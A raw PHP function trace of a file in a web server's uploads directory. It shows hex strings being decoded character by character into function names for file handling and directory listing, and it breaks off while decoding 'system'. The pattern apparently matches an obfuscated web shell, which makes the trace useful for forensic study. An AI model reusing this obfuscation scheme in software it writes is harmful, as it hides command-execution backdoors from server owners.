3	275	0	0.010820	583592	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	275	1	0.010832	583640
3	275	R			101
3	276	0	0.010844	583560	chr	0		/var/www/html/uploads/index.php	178	1	101
3	276	1	0.010855	583600
3	276	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	277	0	0.010885	583592	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	277	1	0.010897	583640
3	277	R			95
3	278	0	0.010909	583560	chr	0		/var/www/html/uploads/index.php	178	1	95
3	278	1	0.010921	583600
3	278	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	279	0	0.010951	583592	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	279	1	0.010963	583640
3	279	R			103
3	280	0	0.010975	583560	chr	0		/var/www/html/uploads/index.php	178	1	103
3	280	1	0.010986	583600
3	280	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	281	0	0.011017	583592	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	281	1	0.011028	583640
3	281	R			101
3	282	0	0.011040	583560	chr	0		/var/www/html/uploads/index.php	178	1	101
3	282	1	0.011052	583600
3	282	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	283	0	0.011081	583592	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	283	1	0.011092	583640
3	283	R			116
3	284	0	0.011104	583560	chr	0		/var/www/html/uploads/index.php	178	1	116
3	284	1	0.011116	583600
3	284	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	285	0	0.011145	583600	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	285	1	0.011157	583648
3	285	R			95
3	286	0	0.011169	583568	chr	0		/var/www/html/uploads/index.php	178	1	95
3	286	1	0.011181	583608
3	286	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	287	0	0.011210	583600	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	287	1	0.011222	583648
3	287	R			99
3	288	0	0.011234	583568	chr	0		/var/www/html/uploads/index.php	178	1	99
3	288	1	0.011245	583608
3	288	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	289	0	0.011275	583600	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	289	1	0.011290	583648
3	289	R			111
3	290	0	0.011302	583568	chr	0		/var/www/html/uploads/index.php	178	1	111
3	290	1	0.011314	583608
3	290	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	291	0	0.011344	583600	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	291	1	0.011355	583648
3	291	R			110
3	292	0	0.011367	583568	chr	0		/var/www/html/uploads/index.php	178	1	110
3	292	1	0.011379	583608
3	292	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	293	0	0.011408	583600	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	293	1	0.011420	583648
3	293	R			116
3	294	0	0.011431	583568	chr	0		/var/www/html/uploads/index.php	178	1	116
3	294	1	0.011443	583608
3	294	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	295	0	0.011472	583600	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	295	1	0.011483	583648
3	295	R			101
3	296	0	0.011495	583568	chr	0		/var/www/html/uploads/index.php	178	1	101
3	296	1	0.011507	583608
3	296	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	297	0	0.011536	583600	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	297	1	0.011548	583648
3	297	R			110
3	298	0	0.011560	583568	chr	0		/var/www/html/uploads/index.php	178	1	110
3	298	1	0.011571	583608
3	298	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	299	0	0.011601	583600	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	299	1	0.011612	583648
3	299	R			116
3	300	0	0.011624	583568	chr	0		/var/www/html/uploads/index.php	178	1	116
3	300	1	0.011635	583608
3	300	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	301	0	0.011665	583608	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	301	1	0.011676	583656
3	301	R			115
3	302	0	0.011688	583576	chr	0		/var/www/html/uploads/index.php	178	1	115
3	302	1	0.011700	583616
3	302	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	268	1	0.011730	583576
2	268	R			'file_get_contents'
1		A						/var/www/html/uploads/index.php	8	$func[14] = 'file_get_contents'
1		A						/var/www/html/uploads/index.php	7	$i++
2	303	0	0.011764	583576	dehex	1		/var/www/html/uploads/index.php	8	1	'6d6b646972'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 9
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	304	0	0.011805	583608	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	304	1	0.011816	583656
3	304	R			109
3	305	0	0.011828	583576	chr	0		/var/www/html/uploads/index.php	178	1	109
3	305	1	0.011840	583616
3	305	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	306	0	0.011870	583640	hexdec	0		/var/www/html/uploads/index.php	178	1	'6b'
3	306	1	0.011882	583688
3	306	R			107
3	307	0	0.011894	583608	chr	0		/var/www/html/uploads/index.php	178	1	107
3	307	1	0.011905	583648
3	307	R			'k'
2		A						/var/www/html/uploads/index.php	178	$r .= 'k'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	308	0	0.011935	583640	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	308	1	0.011947	583688
3	308	R			100
3	309	0	0.011959	583608	chr	0		/var/www/html/uploads/index.php	178	1	100
3	309	1	0.011970	583648
3	309	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	310	0	0.012005	583640	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	310	1	0.012017	583688
3	310	R			105
3	311	0	0.012029	583608	chr	0		/var/www/html/uploads/index.php	178	1	105
3	311	1	0.012040	583648
3	311	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	312	0	0.012070	583640	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	312	1	0.012082	583688
3	312	R			114
3	313	0	0.012094	583608	chr	0		/var/www/html/uploads/index.php	178	1	114
3	313	1	0.012105	583648
3	313	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	303	1	0.012134	583608
2	303	R			'mkdir'
1		A						/var/www/html/uploads/index.php	8	$func[15] = 'mkdir'
1		A						/var/www/html/uploads/index.php	7	$i++
2	314	0	0.012167	583608	dehex	1		/var/www/html/uploads/index.php	8	1	'72656e616d65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 11
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	315	0	0.012207	583640	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	315	1	0.012218	583688
3	315	R			114
3	316	0	0.012230	583608	chr	0		/var/www/html/uploads/index.php	178	1	114
3	316	1	0.012242	583648
3	316	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	317	0	0.012271	583672	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	317	1	0.012283	583720
3	317	R			101
3	318	0	0.012295	583640	chr	0		/var/www/html/uploads/index.php	178	1	101
3	318	1	0.012306	583680
3	318	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	319	0	0.012336	583672	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	319	1	0.012347	583720
3	319	R			110
3	320	0	0.012359	583640	chr	0		/var/www/html/uploads/index.php	178	1	110
3	320	1	0.012371	583680
3	320	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	321	0	0.012400	583672	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	321	1	0.012412	583720
3	321	R			97
3	322	0	0.012424	583640	chr	0		/var/www/html/uploads/index.php	178	1	97
3	322	1	0.012435	583680
3	322	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	323	0	0.012465	583672	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	323	1	0.012476	583720
3	323	R			109
3	324	0	0.012489	583640	chr	0		/var/www/html/uploads/index.php	178	1	109
3	324	1	0.012500	583680
3	324	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	325	0	0.012530	583672	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	325	1	0.012541	583720
3	325	R			101
3	326	0	0.012553	583640	chr	0		/var/www/html/uploads/index.php	178	1	101
3	326	1	0.012564	583680
3	326	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	314	1	0.012594	583640
2	314	R			'rename'
1		A						/var/www/html/uploads/index.php	8	$func[16] = 'rename'
1		A						/var/www/html/uploads/index.php	7	$i++
2	327	0	0.012627	583640	dehex	1		/var/www/html/uploads/index.php	8	1	'737472746f74696d65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 17
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	328	0	0.012668	583672	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	328	1	0.012679	583720
3	328	R			115
3	329	0	0.012691	583640	chr	0		/var/www/html/uploads/index.php	178	1	115
3	329	1	0.012703	583680
3	329	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	330	0	0.012737	583704	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	330	1	0.012748	583752
3	330	R			116
3	331	0	0.012762	583672	chr	0		/var/www/html/uploads/index.php	178	1	116
3	331	1	0.012773	583712
3	331	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	332	0	0.012803	583704	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	332	1	0.012814	583752
3	332	R			114
3	333	0	0.012826	583672	chr	0		/var/www/html/uploads/index.php	178	1	114
3	333	1	0.012837	583712
3	333	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	334	0	0.012867	583704	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	334	1	0.012878	583752
3	334	R			116
3	335	0	0.012890	583672	chr	0		/var/www/html/uploads/index.php	178	1	116
3	335	1	0.012901	583712
3	335	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	336	0	0.012931	583704	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	336	1	0.012943	583752
3	336	R			111
3	337	0	0.012955	583672	chr	0		/var/www/html/uploads/index.php	178	1	111
3	337	1	0.012966	583712
3	337	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	338	0	0.012996	583704	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	338	1	0.013008	583752
3	338	R			116
3	339	0	0.013020	583672	chr	0		/var/www/html/uploads/index.php	178	1	116
3	339	1	0.013037	583712
3	339	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	340	0	0.013067	583704	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	340	1	0.013079	583752
3	340	R			105
3	341	0	0.013091	583672	chr	0		/var/www/html/uploads/index.php	178	1	105
3	341	1	0.013102	583712
3	341	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	342	0	0.013132	583704	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	342	1	0.013144	583752
3	342	R			109
3	343	0	0.013156	583672	chr	0		/var/www/html/uploads/index.php	178	1	109
3	343	1	0.013167	583712
3	343	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	344	0	0.013197	583712	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	344	1	0.013271	583760
3	344	R			101
3	345	0	0.013289	583680	chr	0		/var/www/html/uploads/index.php	178	1	101
3	345	1	0.013300	583720
3	345	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	327	1	0.013331	583680
2	327	R			'strtotime'
1		A						/var/www/html/uploads/index.php	8	$func[17] = 'strtotime'
1		A						/var/www/html/uploads/index.php	7	$i++
2	346	0	0.013366	583680	dehex	1		/var/www/html/uploads/index.php	8	1	'68746d6c7370656369616c6368617273'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 31
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	347	0	0.013409	583712	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	347	1	0.013421	583760
3	347	R			104
3	348	0	0.013433	583680	chr	0		/var/www/html/uploads/index.php	178	1	104
3	348	1	0.013444	583720
3	348	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	349	0	0.013474	583744	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	349	1	0.013486	583792
3	349	R			116
3	350	0	0.013499	583712	chr	0		/var/www/html/uploads/index.php	178	1	116
3	350	1	0.013510	583752
3	350	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	351	0	0.013545	583744	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	351	1	0.013557	583792
3	351	R			109
3	352	0	0.013570	583712	chr	0		/var/www/html/uploads/index.php	178	1	109
3	352	1	0.013581	583752
3	352	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	353	0	0.013646	583744	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	353	1	0.013658	583792
3	353	R			108
3	354	0	0.013671	583712	chr	0		/var/www/html/uploads/index.php	178	1	108
3	354	1	0.013682	583752
3	354	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	355	0	0.013712	583744	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	355	1	0.013724	583792
3	355	R			115
3	356	0	0.013736	583712	chr	0		/var/www/html/uploads/index.php	178	1	115
3	356	1	0.013747	583752
3	356	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	357	0	0.013777	583744	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	357	1	0.013788	583792
3	357	R			112
3	358	0	0.013800	583712	chr	0		/var/www/html/uploads/index.php	178	1	112
3	358	1	0.013811	583752
3	358	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	359	0	0.013841	583744	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	359	1	0.013853	583792
3	359	R			101
3	360	0	0.013865	583712	chr	0		/var/www/html/uploads/index.php	178	1	101
3	360	1	0.013876	583752
3	360	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	361	0	0.013906	583744	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	361	1	0.013917	583792
3	361	R			99
3	362	0	0.013930	583712	chr	0		/var/www/html/uploads/index.php	178	1	99
3	362	1	0.013941	583752
3	362	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	363	0	0.013971	583752	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	363	1	0.013983	583800
3	363	R			105
3	364	0	0.013995	583720	chr	0		/var/www/html/uploads/index.php	178	1	105
3	364	1	0.014007	583760
3	364	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	365	0	0.014037	583752	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	365	1	0.014049	583800
3	365	R			97
3	366	0	0.014061	583720	chr	0		/var/www/html/uploads/index.php	178	1	97
3	366	1	0.014072	583760
3	366	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	367	0	0.014102	583752	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	367	1	0.014114	583800
3	367	R			108
3	368	0	0.014126	583720	chr	0		/var/www/html/uploads/index.php	178	1	108
3	368	1	0.014138	583760
3	368	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	369	0	0.014168	583752	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	369	1	0.014180	583800
3	369	R			99
3	370	0	0.014192	583720	chr	0		/var/www/html/uploads/index.php	178	1	99
3	370	1	0.014203	583760
3	370	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	371	0	0.014234	583752	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	371	1	0.014245	583800
3	371	R			104
3	372	0	0.014258	583720	chr	0		/var/www/html/uploads/index.php	178	1	104
3	372	1	0.014269	583760
3	372	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	373	0	0.014304	583752	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	373	1	0.014317	583800
3	373	R			97
3	374	0	0.014329	583720	chr	0		/var/www/html/uploads/index.php	178	1	97
3	374	1	0.014340	583760
3	374	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	375	0	0.014370	583752	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	375	1	0.014382	583800
3	375	R			114
3	376	0	0.014394	583720	chr	0		/var/www/html/uploads/index.php	178	1	114
3	376	1	0.014405	583760
3	376	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	377	0	0.014435	583752	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	377	1	0.014446	583800
3	377	R			115
3	378	0	0.014458	583720	chr	0		/var/www/html/uploads/index.php	178	1	115
3	378	1	0.014470	583760
3	378	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	346	1	0.014500	583728
2	346	R			'htmlspecialchars'
1		A						/var/www/html/uploads/index.php	8	$func[18] = 'htmlspecialchars'
1		A						/var/www/html/uploads/index.php	7	$i++
2	379	0	0.014542	583728	dehex	1		/var/www/html/uploads/index.php	8	1	'64617465'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 7
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	380	0	0.014583	583760	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	380	1	0.014596	583808
3	380	R			100
3	381	0	0.014609	583728	chr	0		/var/www/html/uploads/index.php	178	1	100
3	381	1	0.014620	583768
3	381	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	382	0	0.014651	583792	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	382	1	0.014663	583840
3	382	R			97
3	383	0	0.014675	583760	chr	0		/var/www/html/uploads/index.php	178	1	97
3	383	1	0.014687	583800
3	383	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	384	0	0.014717	583792	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	384	1	0.014729	583840
3	384	R			116
3	385	0	0.014742	583760	chr	0		/var/www/html/uploads/index.php	178	1	116
3	385	1	0.014753	583800
3	385	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	386	0	0.014783	583792	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	386	1	0.014795	583840
3	386	R			101
3	387	0	0.014811	583760	chr	0		/var/www/html/uploads/index.php	178	1	101
3	387	1	0.014822	583800
3	387	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	379	1	0.014853	583760
2	379	R			'date'
1		A						/var/www/html/uploads/index.php	8	$func[19] = 'date'
1		A						/var/www/html/uploads/index.php	7	$i++
2	388	0	0.014886	583760	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c656d74696d65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 17
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	389	0	0.014927	583792	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	389	1	0.014939	583840
3	389	R			102
3	390	0	0.014952	583760	chr	0		/var/www/html/uploads/index.php	178	1	102
3	390	1	0.014963	583800
3	390	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	391	0	0.014995	583824	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	391	1	0.015006	583872
3	391	R			105
3	392	0	0.015018	583792	chr	0		/var/www/html/uploads/index.php	178	1	105
3	392	1	0.015033	583832
3	392	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	393	0	0.015064	583824	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	393	1	0.015076	583872
3	393	R			108
3	394	0	0.015088	583792	chr	0		/var/www/html/uploads/index.php	178	1	108
3	394	1	0.015099	583832
3	394	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	395	0	0.015130	583824	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	395	1	0.015142	583872
3	395	R			101
3	396	0	0.015154	583792	chr	0		/var/www/html/uploads/index.php	178	1	101
3	396	1	0.015166	583832
3	396	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	397	0	0.015197	583824	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	397	1	0.015209	583872
3	397	R			109
3	398	0	0.015221	583792	chr	0		/var/www/html/uploads/index.php	178	1	109
3	398	1	0.015232	583832
3	398	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	399	0	0.015263	583824	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	399	1	0.015275	583872
3	399	R			116
3	400	0	0.015287	583792	chr	0		/var/www/html/uploads/index.php	178	1	116
3	400	1	0.015299	583832
3	400	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	401	0	0.015329	583824	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	401	1	0.015341	583872
3	401	R			105
3	402	0	0.015353	583792	chr	0		/var/www/html/uploads/index.php	178	1	105
3	402	1	0.015364	583832
3	402	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	403	0	0.015395	583824	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	403	1	0.015407	583872
3	403	R			109
3	404	0	0.015418	583792	chr	0		/var/www/html/uploads/index.php	178	1	109
3	404	1	0.015430	583832
3	404	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	405	0	0.015460	583832	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	405	1	0.015472	583880
3	405	R			101
3	406	0	0.015484	583800	chr	0		/var/www/html/uploads/index.php	178	1	101
3	406	1	0.015495	583840
3	406	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	388	1	0.015525	583800
2	388	R			'filemtime'
1		A						/var/www/html/uploads/index.php	8	$func[20] = 'filemtime'
1		A						/var/www/html/uploads/index.php	7	$i++
2	407	0	0.015559	583800	dehex	1		/var/www/html/uploads/index.php	8	1	'7363616e646972'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 13
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	408	0	0.015600	583832	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	408	1	0.015612	583880
3	408	R			115
3	409	0	0.015624	583800	chr	0		/var/www/html/uploads/index.php	178	1	115
3	409	1	0.015636	583840
3	409	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	410	0	0.015666	583864	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	410	1	0.015678	583912
3	410	R			99
3	411	0	0.015690	583832	chr	0		/var/www/html/uploads/index.php	178	1	99
3	411	1	0.015701	583872
3	411	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	412	0	0.015732	583864	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	412	1	0.015743	583912
3	412	R			97
3	413	0	0.015761	583832	chr	0		/var/www/html/uploads/index.php	178	1	97
3	413	1	0.015772	583872
3	413	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	414	0	0.015802	583864	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	414	1	0.015814	583912
3	414	R			110
3	415	0	0.015827	583832	chr	0		/var/www/html/uploads/index.php	178	1	110
3	415	1	0.015838	583872
3	415	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	416	0	0.015869	583864	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	416	1	0.015880	583912
3	416	R			100
3	417	0	0.015892	583832	chr	0		/var/www/html/uploads/index.php	178	1	100
3	417	1	0.015903	583872
3	417	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	418	0	0.015933	583864	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	418	1	0.015945	583912
3	418	R			105
3	419	0	0.015957	583832	chr	0		/var/www/html/uploads/index.php	178	1	105
3	419	1	0.015968	583872
3	419	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	420	0	0.015998	583864	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	420	1	0.016010	583912
3	420	R			114
3	421	0	0.016022	583832	chr	0		/var/www/html/uploads/index.php	178	1	114
3	421	1	0.016033	583872
3	421	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	407	1	0.016064	583832
2	407	R			'scandir'
1		A						/var/www/html/uploads/index.php	8	$func[21] = 'scandir'
1		A						/var/www/html/uploads/index.php	7	$i++
2	422	0	0.016098	583832	dehex	1		/var/www/html/uploads/index.php	8	1	'73797374656d'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 11
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	423	0	0.016140	583864	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	423	1	0.016152	583912
3	423	R			115
3	424	0	0.016164	583832	chr	0		/var/www/html/uploads/index.php	178	1	115
3	424	1	0.016176	583872
3	424	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
